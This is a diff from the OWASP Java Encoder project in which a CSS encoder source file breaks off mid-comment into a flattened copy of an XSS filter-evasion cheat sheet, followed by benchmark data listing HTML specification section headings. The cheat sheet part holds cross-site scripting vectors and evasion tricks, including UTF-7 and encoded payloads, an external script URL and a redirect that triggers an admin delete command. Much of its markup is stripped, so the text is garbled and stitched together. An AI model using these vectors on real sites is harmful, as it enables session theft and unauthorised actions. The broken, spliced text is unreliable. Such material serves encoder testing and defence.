copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder; + +import java.nio.CharBuffer; +import java.nio.charset.CoderResult; + +/** + * CSSEncoder -- Encoder for Cascading-Style-Sheet string and URI contexts. + * Other contexts, such as color, number (w/unit), etc... are not good targets + * for "encoding" (e.g. you cannot encode the string "XYZ" into a number), + * they should instead by validated through other means (such as regular + * expressions). + */ +class CSSEncoder extends Encoder { + + /** Number of bits in a {@code long}. */ + static final int LONG_BITS = 64; + + /** Length of hex encoding with trailing space {@code "\## "}. */ + static final int HEX_ENCODED_LENGTH = 4; + + /** + * Encoding mode of operation--specified the set of characters that + * required encoding. + */ + enum Mode { + /** + * String contexts. Characters between quotes. + * + * 
+         *   Not allowed: \n \r \f \\ " '  (everything else is allowed)
+         *   Allows: "\\{nl}" (escaped newline)
+         *
+ */ + STRING(new ASCIIBits().set(' ', '~').clear("\"\'<&/\\>")), + + /** + * URL context. Characters inside a "url(...)". + * + * 
+         *   Allowed: [!#$%&*-\[\]-~]|{nonascii}|{escape}
+         *   Escapes: \\[0-9a-f]{1,6}(\s?)
+         *            \\[^\n\r\f0-9a-f]
+         *
+ */ + URL(new ASCIIBits().set("!#$%").set('*', '[').set(']', '~').clear("/<>")), + + // In both contexts above '<' is added to protect embedded tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world: + +Remote style sheet part 3 +. This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to +RFC2616 +setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: ; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox: + +Remote style sheet part 4 +. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites: + +Local htc file +. This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute: + +List-style-image +. Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector: +
  • XSS +VBscript +in an image: + +Mocha +(older versions of Netscape only): + +Livescript + +US-ASCII +encoding (found by +Kurt Huwig +). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. I highly suggest anyone interested in alternate encoding issues look at +my charsets issues +page: +¼script¾alert(¢XSS¢)¼/script¾ +META +(the odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs): + +META using data: directive +URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see +RFC 2397 +for more details or go +or +to encode your own. You can also use the +below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method: + +META with additional URL parameter +. If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by +Moritz Naumann +): + +IFRAME +(if iframes are allowed there are a lot of other XSS problems as well): + +FRAME +(frames have the same sorts of XSS problems as iframes): + +TABLE +(who would have thought tables were XSS targets... except me, of course): + +TD +(just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors): +
    +DIV background-image +
    +DIV background-image with unicoded XSS +exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by +Renaud Lifchitz +as a vulnerability in Hotmail: +
    +DIV background-image plus extra characters +. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279): +
    +DIV expression +- a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression": +
    +STYLE +tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts): + +STYLE attribute using a comment +to break up expression (Thanks to +Roman Ivanov +for this one): + +Anonymous HTML with STYLE attribute +(IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter): + +IMG STYLE with expression +(this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop): +exp/* +STYLE tag +(Older versions of Netscape only): + +STYLE tag using background-image + +STYLE tag using background + +Downlevel-Hidden +block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job: + +BASE +tag. Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work): + +OBJECT +tag (if they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS: + +Using an OBJECT tag +you can embed XSS directly (this is unverified so no browser support is added): + +Using an EMBED tag +you can embed a Flash movie that contains XSS. +Click here for a demo +. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: + +You can EMBED SVG +which can contain your XSS vector. This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to +nEUrOO +for this one. + +Using ActionScript +inside flash can obfuscate your XSS vector: +a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); +XML namespace +. The htc file must be located on the same server as your XSS vector: + XSS +XML data island +with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by +Sec Consult +while auditing Yahoo: +]]> +XML data island with comment obfuscation +(this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive): +<IMG SRC="javascript:alert('XSS')"> +Locally hosted XML with embedded JavaScript +that is generated using an XML data island. This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result + +HTML+TIME in XML +. This is how +Grey Magic hacked Hotmail and Yahoo! +. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work: + +Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript +file to an image as an XSS vector: + +SSI +(Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues: + +PHP +- requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues: +alert("XSS")'); ?> +IMG Embedded +commands - this works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors: + +IMG Embedded commands part II +- this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this): +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +Cookie manipulation +- admittidly this is pretty obscure but I have seen a few examples where +UTF-7 +encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to +for this one). Click +for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. +Watchfire found this hole +in Google's custom 404 script.: + +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +XSS using HTML quote encapsulation: +This was tested in IE, your mileage may vary. For performing XSS on sites that allow " +For performing XSS on sites that allow " +Another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i": + +Yet another XSS to evade the same filter, "/\s]+))?)+\s*|\s*)src/i". I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow +And one last XSS attack to evade, "/\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox): + +Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly: + +This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content: +PT SRC="http://ha.ckers.org/xss.js"> +URL string evasion (assuming "http://www.google.com/" is programmatically disallowed): +IP verses hostname: +XSS +URL encoding: +XSS +Dword encoding (Note: there are other of variations of Dword encoding - see the +IP Obfuscation calculator below +for more details): +XSS +Hex encoding (the total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required): +XSS +Octal encoding (again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...): +XSS +Mixed encoding (let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes: +XSS +Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to +Ozh +for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. +XSS +Google "feeling lucky" part 1. Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatinate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0. +XSS +Google "feeling lucky" part 2. This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0: +XSS +Google "feeling lucky" part 3. This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"): +XSS +Removing cnames (when combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly): +XSS +Extra dot for absolute DNS: +XSS +JavaScript link location: +XSS +Content replace as attack vector (assuming "http://www.google.com/" is programmatically replaced with nothing). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself ( +here is an example +) to help create the attack vector (IE: "java&#x09;script:" was converted into "java script:", which renders in IE, Netscape 8.1+ in secure site mode and Opera): +XSS +Character Encoding: +All the possible combinations of the character "<" in HTML and JavaScript (in UTF-8). Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above (standards are great, aren't they?): +< %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C +Character Encoding Calculator +ASCII Text: +Enter your XSS here +Hex Value: +URL: +HTML (with semicolons): +Decimal Value: +HTML (without semicolons): +Base64 Value +( +a more robust base64 calculator can be found here +) +Base64: +IP Obfuscation Calculator +IP Address: +: dword level +Dword Address: +Hex Address: +Octal Address: +Browser support reference table: +Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2. +Vector works in Internet Explorer. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000. +Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed it's security model away from the trusted/untrusted model and has opted towards Gecko as a default and IE as an option. +Vector works in Netscape 8.1+ in the Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional +Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional. +Vector works in Opera. Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional +Vector works in older versions of Netscape 4.0 - untested. +Note: if a vector is not marked it either does not work or it is untested. +Written in vim, and UTF-8 encoded, for her pleasure. +All rights reserved, all wrongs observed. +© 1995-2008 diff --git a/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt b/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt new file mode 100644 index 0000000..da3e2d0 --- /dev/null +++ b/core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt @@ -0,0 +1,4921 @@ +"already\n started" +"already\n started" +"already started" +"current" position +"force-async" +"parser-inserted" +"ready to be parser-executed" +<fragment> +<host> +<hostport> +<meta name=""\n content=""> +<path> +<port> +<query> +<scheme> +<script type=""> +5\n February 2004 W3C Patent Policy +:active +:checked +:default +:dir(ltr) +:dir(rtl) +:disabled +:enabled +:in-range +:indeterminate +:invalid +:link +:optional +:out-of-range +:read-only +:read-write +:required +:valid +:visited +ERCIM +MIT +W3C +Name +application/x-www-form-urlencoded encoding\n algorithm +application/x-www-form-urlencoded encoding\n algorithm +data:\n URL +data:\n URL +data: URL +form element\n pointer +form element pointer +head\n element pointer +head element\n pointer +head element pointer +javascript:\n URL +javascript: URL +lang\n attribute in the XML namespace +lang\n attributes in the XML namespace +lang attribute\n in the XML namespace +lang attribute in the\n XML namespace +lang attribute in the XML\n namespace +lang attributes in\n the XML namespace +lang attributes in the\n XML namespace +multipart/form-data boundary string +multipart/form-data encoding\n algorithm +multipart/form-data encoding\n algorithm +text/plain encoding\n algorithm +dropzone processing\n steps +form element\n pointer +form element pointer +CDATASection nodes in the DOM are treated as\n equivalent to Text nodes +MediaStream and\n PeerConnection events +XMLHttpRequest +form element\n pointer +form element pointer +head element +hreflang\n attribute on a and area\n elements +html element +iframe srcdoc documents +input type keyword +javascript:\n URL +javascript: URL +in the\n Document +parent browsing context +W3C +1 Introduction +1.1 Background +1.10 Recommended reading +1.2 Audience +1.3 Scope +1.4 History +1.5 Design notes +1.5.1 Serializability of script execution +1.5.2 Compliance with other specifications +1.6 HTML vs XHTML +1.7 Structure of this specification +1.7.1 How to read this specification +1.7.2 Typographic conventions +1.8 A quick introduction to HTML +1.8.1 Writing secure applications with HTML +1.8.2 Common pitfalls to avoid when using the scripting APIs +1.9 Conformance requirements for authors +1.9.1 Presentational markup +1.9.2 Syntax errors +1.9.3 Restrictions on content models and on attribute values +10 Rendering +10.1 Introduction +10.2 The CSS user agent style sheet and presentational hints +10.3 Non-replaced elements +10.3.1 Hidden elements +10.3.10 The hr element +10.3.11 The fieldset element +10.3.2 The page +10.3.3 Flow content +10.3.4 Phrasing content +10.3.5 Bidirectional text +10.3.6 Sections and headings +10.3.7 Lists +10.3.8 Tables +10.3.9 Form controls +10.4 Replaced elements +10.4.1 Embedded content +10.4.2 Timed text tracks +10.4.2.1 WebVTT cue text rendering rules +10.4.2.2 Applying CSS properties to WebVTT Node Objects +10.4.2.3 CSS extensions +10.4.2.3.1 The '::cue' pseudo-element +10.4.2.3.2 The ':past' and ':future' pseudo-classes +10.4.3 Images +10.4.4 Attributes for embedded content and images +10.4.5 Image maps +10.4.6 Toolbars +10.5 Bindings +10.5.1 Introduction +10.5.10 The input element as a button +10.5.11 The marquee element +10.5.12 The meter element +10.5.13 The progress element +10.5.14 The select element +10.5.15 The textarea element +10.5.16 The keygen element +10.5.17 The time element +10.5.2 The button element +10.5.3 The details element +10.5.4 The input element as a text entry widget +10.5.5 The input element as domain-specific widgets +10.5.6 The input element as a range control +10.5.7 The input element as a color well +10.5.8 The input element as a checkbox and radio button widgets +10.5.9 The input element as a file upload control +10.6 Frames and framesets +10.7 Interactive media +10.7.1 Links, forms, and navigation +10.7.2 The title attribute +10.7.3 Editing hosts +10.7.4 Text rendered in native user interfaces +10.8 Print media +11 Obsolete features +11.1 Obsolete but conforming features +11.1.1 Warnings for obsolete but conforming features +11.2 Non-conforming features +11.3 Requirements for implementations +11.3.1 The applet element +11.3.2 The marquee element +11.3.3 Frames +11.3.4 Other elements, attributes and APIs +12 IANA considerations +12.1 text/html +12.2 multipart/x-mixed-replace +12.3 application/xhtml+xml +12.4 application/x-www-form-urlencoded +12.5 text/cache-manifest +12.6 web+ scheme prefix +2 Common infrastructure +2.1 Terminology +2.1.1 Resources +2.1.2 XML +2.1.3 DOM trees +2.1.4 Scripting +2.1.5 Plugins +2.1.6 Character encodings +2.2 Conformance requirements +2.2.1 Conformance classes +2.2.2 Dependencies +2.2.3 Extensibility +2.3 Case-sensitivity and string comparison +2.4 UTF-8 +2.5 Common microsyntaxes +2.5.1 Common parser idioms +2.5.10 Media queries +2.5.2 Boolean attributes +2.5.3 Keywords and enumerated attributes +2.5.4 Numbers +2.5.4.1 Signed integers +2.5.4.2 Non-negative integers +2.5.4.3 Floating-point numbers +2.5.4.4 Percentages and lengths +2.5.4.5 Lists of integers +2.5.4.6 Lists of dimensions +2.5.5 Dates and times +2.5.5.1 Months +2.5.5.2 Dates +2.5.5.3 Times +2.5.5.4 Local dates and times +2.5.5.5 Global dates and times +2.5.5.6 Weeks +2.5.5.7 Vaguer moments in time +2.5.6 Colors +2.5.7 Space-separated tokens +2.5.8 Comma-separated tokens +2.5.9 References +2.6 URLs +2.6.1 Terminology +2.6.2 Parsing URLs +2.6.3 Resolving URLs +2.6.4 URL manipulation and creation +2.6.5 Dynamic changes to base URLs +2.6.6 Interfaces for URL manipulation +2.7 Fetching resources +2.7.1 Protocol concepts +2.7.2 Encrypted HTTP and related security concerns +2.7.3 Determining the type of a resource +2.7.4 Extracting encodings from meta elements +2.7.5 CORS settings attributes +2.7.6 CORS-enabled fetch +2.8 Common DOM interfaces +2.8.1 Reflecting content attributes in IDL attributes +2.8.2 Collections +2.8.2.1 HTMLAllCollection +2.8.2.2 HTMLFormControlsCollection +2.8.2.3 HTMLOptionsCollection +2.8.3 DOMStringMap +2.8.4 Transferable objects +2.8.5 Safe passing of structured data +2.8.6 DOM feature strings +2.8.7 Garbage collection +2.9 Namespaces +3 Semantics, structure, and APIs of HTML documents +3.1 Documents +3.1.1 Documents in the DOM +3.1.2 Security +3.1.3 Resource metadata management +3.1.4 DOM tree accessors +3.1.5 Loading XML documents +3.2 Elements +3.2.1 Semantics +3.2.2 Elements in the DOM +3.2.3 Global attributes +3.2.3.1 The id attribute +3.2.3.2 The title attribute +3.2.3.3 The lang and xml:lang attributes +3.2.3.4 The xml:base\n attribute (XML only) +3.2.3.5 The dir attribute +3.2.3.6 The class attribute +3.2.3.7 The style attribute +3.2.3.8 Embedding custom non-visible data with the data-* attributes +3.2.4 Element definitions +3.2.4.1 Attributes +3.2.5 Content models +3.2.5.1 Kinds of content +3.2.5.1.1 Metadata content +3.2.5.1.2 Flow content +3.2.5.1.3 Sectioning content +3.2.5.1.4 Heading content +3.2.5.1.5 Phrasing content +3.2.5.1.6 Embedded content +3.2.5.1.7 Interactive content +3.2.5.1.8 Palpable content +3.2.5.2 Transparent content models +3.2.5.3 Paragraphs +3.2.6 Requirements relating to bidirectional-algorithm formatting\n characters +3.2.7 WAI-ARIA +3.3 Interactions with XPath and XSLT +3.4 Dynamic markup insertion +3.4.1 Opening the input stream +3.4.2 Closing the input stream +3.4.3 document.write() +3.4.4 document.writeln() +4 The elements of HTML +4.1 The root element +4.1.1 The html element +4.10 Forms +4.10.1 Introduction +4.10.1.1 Writing a form's user interface +4.10.1.2 Implementing the server-side processing for a form +4.10.1.3 Configuring a form to communicate with a server +4.10.1.4 Client-side form validation +4.10.10 The datalist element +4.10.11 The optgroup element +4.10.12 The option element +4.10.13 The textarea element +4.10.14 The keygen element +4.10.15 The output element +4.10.16 The progress element +4.10.17 The meter element +4.10.18 Association of controls and forms +4.10.19 Attributes common to form controls +4.10.19.1 Naming form controls +4.10.19.2 Enabling and disabling form controls +4.10.19.3 A form control's value +4.10.19.4 Autofocusing a form control +4.10.19.5 Limiting user input length +4.10.19.6 Form submission +4.10.19.7 Submitting element directionality +4.10.2 Categories +4.10.20 APIs for the text field selections +4.10.21 Constraints +4.10.21.1 Definitions +4.10.21.2 Constraint validation +4.10.21.3 The constraint validation API +4.10.21.4 Security +4.10.22 Form submission +4.10.22.1 Introduction +4.10.22.2 Implicit submission +4.10.22.3 Form submission algorithm +4.10.22.4 Constructing the form data set +4.10.22.5 URL-encoded form data +4.10.22.6 Multipart form data +4.10.22.7 Plain text form data +4.10.23 Resetting a form +4.10.3 The form element +4.10.4 The fieldset element +4.10.5 The legend element +4.10.6 The label element +4.10.7 The input element +4.10.7.1 States of the type attribute +4.10.7.1.1 Hidden state +4.10.7.1.10 Week state +4.10.7.1.11 Time state +4.10.7.1.12 Local Date and Time state +4.10.7.1.13 Number state +4.10.7.1.14 Range state +4.10.7.1.15 Color state +4.10.7.1.16 Checkbox state +4.10.7.1.17 Radio Button state +4.10.7.1.18 File Upload state +4.10.7.1.19 Submit Button state +4.10.7.1.2 Text state and Search state +4.10.7.1.20 Image Button state +4.10.7.1.21 Reset Button state +4.10.7.1.22 Button state +4.10.7.1.3 Telephone state +4.10.7.1.4 URL state +4.10.7.1.5 E-mail state +4.10.7.1.6 Password state +4.10.7.1.7 Date and Time state +4.10.7.1.8 Date state +4.10.7.1.9 Month state +4.10.7.2 Common input element attributes +4.10.7.2.1 The autocomplete attribute +4.10.7.2.10 The min and max attributes +4.10.7.2.11 The step attribute +4.10.7.2.12 The placeholder attribute +4.10.7.2.2 The dirname attribute +4.10.7.2.3 The list attribute +4.10.7.2.4 The readonly attribute +4.10.7.2.5 The size attribute +4.10.7.2.6 The required attribute +4.10.7.2.7 The multiple attribute +4.10.7.2.8 The maxlength attribute +4.10.7.2.9 The pattern attribute +4.10.7.3 Common input element APIs +4.10.7.4 Common event behaviors +4.10.8 The button element +4.10.9 The select element +4.11 Interactive elements +4.11.1 The details element +4.11.2 The summary element +4.11.3 The command element +4.11.4 The menu element +4.11.4.1 Introduction +4.11.4.2 Building menus and toolbars +4.11.4.3 Context menus +4.11.4.4 Toolbars +4.11.5 Commands +4.11.5.1 Using the a element to define a command +4.11.5.2 Using the button element to define a command +4.11.5.3 Using the input element to define a command +4.11.5.4 Using the option element to define a command +4.11.5.5 Using the command element to define\n a command +4.11.5.6 Using the accesskey attribute on a label element to define a command +4.11.5.7 Using the accesskey attribute on a legend element to define a command +4.11.5.8 Using the accesskey attribute to define a command on other elements +4.12 Links +4.12.1 Introduction +4.12.2 Links created by a and area elements +4.12.3 Following hyperlinks +4.12.4 Link types +4.12.4.1 Link type "alternate" +4.12.4.10 Link type "search" +4.12.4.11 Link type "stylesheet" +4.12.4.12 Link type "tag" +4.12.4.13 Sequential link types +4.12.4.13.1 Link type "next" +4.12.4.13.2 Link type "prev" +4.12.4.14 Other link types +4.12.4.2 Link type "author" +4.12.4.3 Link type "bookmark" +4.12.4.4 Link type "help" +4.12.4.5 Link type "icon" +4.12.4.6 Link type "license" +4.12.4.7 Link type "nofollow" +4.12.4.8 Link type "noreferrer" +4.12.4.9 Link type "prefetch" +4.13 Common idioms without dedicated elements +4.13.1 The main part of the content +4.13.2 Bread crumb navigation +4.13.3 Tag clouds +4.13.4 Conversations +4.13.5 Footnotes +4.14 Matching HTML elements using selectors +4.14.1 Case-sensitivity +4.14.2 Pseudo-classes +4.2 Document metadata +4.2.1 The head element +4.2.2 The title element +4.2.3 The base element +4.2.4 The link element +4.2.5 The meta element +4.2.5.1 Standard metadata names +4.2.5.2 Other metadata names +4.2.5.3 Pragma directives +4.2.5.4 Other pragma directives +4.2.5.5 Specifying the document's character encoding +4.2.6 The style element +4.2.7 Styling +4.3 Scripting +4.3.1 The script element +4.3.1.1 Scripting languages +4.3.1.2 Restrictions for contents of script elements +4.3.1.3 Inline documentation for external scripts +4.3.1.4 Interaction of script elements and XSLT +4.3.2 The noscript element +4.4 Sections +4.4.1 The body element +4.4.10 The address element +4.4.11 Headings and sections +4.4.11.1 Creating an outline +4.4.2 The section element +4.4.3 The nav element +4.4.4 The article element +4.4.5 The aside element +4.4.6 The h1, h2, h3, h4, h5, and h6 elements +4.4.7 The hgroup element +4.4.8 The header element +4.4.9 The footer element +4.5 Grouping content +4.5.1 The p element +4.5.10 The dd element +4.5.11 The figure element +4.5.12 The figcaption element +4.5.13 The div element +4.5.2 The hr element +4.5.3 The pre element +4.5.4 The blockquote element +4.5.5 The ol element +4.5.6 The ul element +4.5.7 The li element +4.5.8 The dl element +4.5.9 The dt element +4.6 Text-level semantics +4.6.1 The a element +4.6.10 The time element +4.6.11 The code element +4.6.12 The var element +4.6.13 The samp element +4.6.14 The kbd element +4.6.15 The sub and sup elements +4.6.16 The i element +4.6.17 The b element +4.6.18 The u element +4.6.19 The mark element +4.6.2 The em element +4.6.20 The ruby element +4.6.21 The rt element +4.6.22 The rp element +4.6.23 The bdi element +4.6.24 The bdo element +4.6.25 The span element +4.6.26 The br element +4.6.27 The wbr element +4.6.28 Usage summary +4.6.3 The strong element +4.6.4 The small element +4.6.5 The s element +4.6.6 The cite element +4.6.7 The q element +4.6.8 The dfn element +4.6.9 The abbr element +4.7 Edits +4.7.1 The ins element +4.7.2 The del element +4.7.3 Attributes common to ins and del elements +4.7.4 Edits and paragraphs +4.7.5 Edits and lists +4.7.6 Edits and tables +4.8 Embedded content +4.8.1 The img element +4.8.1.1 Requirements for providing text to act as an alternative for images +4.8.1.1.1 General guidelines +4.8.1.1.10 A key part of the content +4.8.1.1.11 An image not intended for the user +4.8.1.1.12 Guidance for markup generators +4.8.1.1.13 Guidance for conformance checkers +4.8.1.1.2 A link or button containing nothing but the image +4.8.1.1.3 A phrase or paragraph with an alternative graphical representation: charts, diagrams, graphs, maps, illustrations +4.8.1.1.4 A short phrase or label with an alternative graphical representation: icons, logos +4.8.1.1.5 Text that has been rendered to a graphic for typographical effect +4.8.1.1.6 A graphical representation of some of the surrounding text +4.8.1.1.7 A purely decorative image that doesn't add any information +4.8.1.1.8 A group of images that form a single larger picture with no links +4.8.1.1.9 A group of images that form a single larger picture with links +4.8.10 Media elements +4.8.10.1 Error codes +4.8.10.10 Media resources with multiple media tracks +4.8.10.10.1 AudioTrackList and VideoTrackList objects +4.8.10.10.2 Selecting specific audio and video tracks declaratively +4.8.10.11 Synchronising multiple media elements +4.8.10.11.1 Introduction +4.8.10.11.2 Media controllers +4.8.10.11.3 Assigning a media controller declaratively +4.8.10.12 Timed text tracks +4.8.10.12.1 Text track model +4.8.10.12.2 Sourcing in-band text tracks +4.8.10.12.3 Sourcing out-of-band text tracks +4.8.10.12.4 Text track API +4.8.10.12.5 Text tracks describing chapters +4.8.10.12.6 Event definitions +4.8.10.13 User interface +4.8.10.14 Time ranges +4.8.10.15 Event definitions +4.8.10.16 Event summary +4.8.10.17 Security and privacy considerations +4.8.10.18 Best practices for authors using media elements +4.8.10.19 Best practices for implementors of media elements +4.8.10.2 Location of the media resource +4.8.10.3 MIME types +4.8.10.4 Network states +4.8.10.5 Loading the media resource +4.8.10.6 Offsets into the media resource +4.8.10.7 Ready states +4.8.10.8 Playing the media resource +4.8.10.9 Seeking +4.8.11 The canvas element +4.8.11.1 Color spaces and color correction +4.8.11.2 Security with canvas elements +4.8.12 The map element +4.8.13 The area element +4.8.14 Image maps +4.8.14.1 Authoring +4.8.14.2 Processing model +4.8.15 MathML +4.8.16 SVG +4.8.17 Dimension attributes +4.8.2 The iframe element +4.8.3 The embed element +4.8.4 The object element +4.8.5 The param element +4.8.6 The video element +4.8.7 The audio element +4.8.8 The source element +4.8.9 The track element +4.9 Tabular data +4.9.1 The table element +4.9.1.1 Techniques for describing tables +4.9.1.2 Techniques for table layout +4.9.10 The th element +4.9.11 Attributes common to td and th elements +4.9.12 Processing model +4.9.12.1 Forming a table +4.9.12.2 Forming relationships between data cells and header cells +4.9.13 Examples +4.9.2 The caption element +4.9.3 The colgroup element +4.9.4 The col element +4.9.5 The tbody element +4.9.6 The thead element +4.9.7 The tfoot element +4.9.8 The tr element +4.9.9 The td element +5 Loading Web pages +5.1 Browsing contexts +5.1.1 Nested browsing contexts +5.1.1.1 Navigating nested browsing contexts in the DOM +5.1.2 Auxiliary browsing contexts +5.1.2.1 Navigating auxiliary browsing contexts in the DOM 